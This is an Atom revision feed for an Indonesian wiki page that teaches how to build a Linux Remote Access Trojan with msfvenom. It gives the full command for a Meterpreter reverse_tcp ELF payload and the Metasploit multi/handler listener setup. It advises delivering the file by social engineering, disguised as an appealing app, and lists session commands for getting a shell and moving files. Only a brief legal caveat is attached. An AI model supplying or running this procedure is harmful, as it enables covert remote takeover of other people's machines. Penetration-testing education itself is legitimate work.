<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=MSF%3A_msfvenom_untuk_linux</id>
	<title>MSF: msfvenom untuk linux - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=MSF%3A_msfvenom_untuk_linux"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_msfvenom_untuk_linux&amp;action=history"/>
	<updated>2026-04-20T23:28:02Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_msfvenom_untuk_linux&amp;diff=71278&amp;oldid=prev</id>
		<title>Unknown user: Created page with &quot;&#039;&#039;&#039;MSFVenom&#039;&#039;&#039; adalah salah satu alat dalam Metasploit Framework yang digunakan untuk membuat payloads dan exploit binaries. Untuk membuat dan menggunakan &#039;&#039;&#039;Remote Access Tro...&quot;</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_msfvenom_untuk_linux&amp;diff=71278&amp;oldid=prev"/>
		<updated>2024-11-25T11:39:38Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;MSFVenom&amp;#039;&amp;#039;&amp;#039; adalah salah satu alat dalam Metasploit Framework yang digunakan untuk membuat payloads dan exploit binaries. Untuk membuat dan menggunakan &amp;#039;&amp;#039;&amp;#039;Remote Access Tro...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;#039;&amp;#039;&amp;#039;MSFVenom&amp;#039;&amp;#039;&amp;#039; adalah salah satu alat dalam Metasploit Framework yang digunakan untuk membuat payloads dan exploit binaries. Untuk membuat dan menggunakan &amp;#039;&amp;#039;&amp;#039;Remote Access Trojan (RAT)&amp;#039;&amp;#039;&amp;#039; di Ubuntu menggunakan MSFVenom, berikut adalah langkah-langkahnya:&lt;br /&gt;
&lt;br /&gt;
==1. Memahami MSFVenom==&lt;br /&gt;
MSFVenom digunakan untuk membuat payload yang dapat dieksekusi oleh target, yang kemudian memungkinkan kita mendapatkan akses remote. Beberapa format payload yang sering digunakan termasuk `exe`, `apk`, `php`, `bash`, dan lainnya.&lt;br /&gt;
&lt;br /&gt;
==2. Membuat Payload dengan MSFVenom==&lt;br /&gt;
Sebagai contoh, kita akan membuat payload berformat Linux ELF untuk dijalankan pada sistem Ubuntu target.&lt;br /&gt;
&lt;br /&gt;
===Perintah untuk Membuat Payload:===&lt;br /&gt;
&lt;br /&gt;
 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&amp;lt;IP-Anda&amp;gt; LPORT=&amp;lt;Port-Anda&amp;gt; -f elf &amp;gt; payload.elf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Penjelasan:===&lt;br /&gt;
* **`-p linux/x86/meterpreter/reverse_tcp`**: Memilih payload Meterpreter untuk Linux dengan koneksi reverse TCP.&lt;br /&gt;
* **`LHOST=&amp;lt;IP-Anda&amp;gt;`**: IP perangkat Anda yang akan menerima koneksi dari target.&lt;br /&gt;
* **`LPORT=&amp;lt;Port-Anda&amp;gt;`**: Port yang akan Anda gunakan untuk mendengarkan koneksi.&lt;br /&gt;
* **`-f elf`**: Format output file menjadi ELF (Executable and Linkable Format).&lt;br /&gt;
* **`&amp;gt; payload.elf`**: Menyimpan payload sebagai file bernama `payload.elf`.&lt;br /&gt;
&lt;br /&gt;
==3. Menyiapkan Listener di Metasploit==&lt;br /&gt;
Setelah payload dibuat, Anda perlu menyiapkan listener untuk menerima koneksi dari target.&lt;br /&gt;
&lt;br /&gt;
===Langkah-Langkah:===&lt;br /&gt;
1. Jalankan Metasploit:&lt;br /&gt;
&lt;br /&gt;
   msfconsole&lt;br /&gt;
   ```&lt;br /&gt;
&lt;br /&gt;
2. Konfigurasikan Listener:&lt;br /&gt;
&lt;br /&gt;
   use exploit/multi/handler&lt;br /&gt;
   set payload linux/x86/meterpreter/reverse_tcp&lt;br /&gt;
   set LHOST &amp;lt;IP-Anda&amp;gt;&lt;br /&gt;
   set LPORT &amp;lt;Port-Anda&amp;gt;&lt;br /&gt;
   exploit&lt;br /&gt;
   **Penjelasan:**&lt;br /&gt;
   - **`use exploit/multi/handler`**: Menggunakan handler untuk menangkap koneksi.&lt;br /&gt;
   - **`set payload`**: Menentukan payload yang sesuai dengan yang dibuat di langkah 2.&lt;br /&gt;
   - **`LHOST` dan `LPORT`**: Harus sesuai dengan yang digunakan saat membuat payload.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==4. Menyebarkan Payload ke Target==&lt;br /&gt;
Anda perlu mentransfer file `payload.elf` ke sistem target, misalnya melalui:&lt;br /&gt;
* **Social Engineering**: Misalnya, menyamarkan file sebagai aplikasi yang menarik.&lt;br /&gt;
* **Eksploitasi Lainnya**: Menggunakan kerentanan yang ada untuk mengunggah file ke sistem target.&lt;br /&gt;
&lt;br /&gt;
Pada target, eksekusi file payload:&lt;br /&gt;
&lt;br /&gt;
 chmod +x payload.elf&lt;br /&gt;
 ./payload.elf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5. Mendapatkan Akses Remote==&lt;br /&gt;
Jika file payload berhasil dijalankan, Anda akan mendapatkan session Meterpreter di Metasploit. Contoh perintah yang bisa digunakan di session:&lt;br /&gt;
* **`sysinfo`**: Melihat informasi sistem target.&lt;br /&gt;
* **`shell`**: Mendapatkan akses shell.&lt;br /&gt;
* **`upload`/`download`**: Mengunggah atau mengunduh file.&lt;br /&gt;
* **`exit`**: Keluar dari session.&lt;br /&gt;
&lt;br /&gt;
==6. Tips Keamanan==&lt;br /&gt;
Penggunaan alat seperti MSFVenom harus sesuai dengan hukum dan izin dari pemilik sistem target. Jika tidak, hal ini termasuk pelanggaran hukum (hacking).&lt;br /&gt;
&lt;br /&gt;
Jika Anda hanya ingin belajar:&lt;br /&gt;
1. Gunakan sistem virtual (misalnya, VirtualBox) untuk menjalankan eksperimen.&lt;br /&gt;
2. Jangan uji payload pada sistem yang tidak Anda miliki izin.&lt;br /&gt;
&lt;br /&gt;
--- &lt;br /&gt;
&lt;br /&gt;
Jika ada pertanyaan atau butuh bantuan lebih lanjut, silakan tanyakan! 😊&lt;/div&gt;</summary>
		<author><name>Unknown user</name></author>
	</entry>
</feed>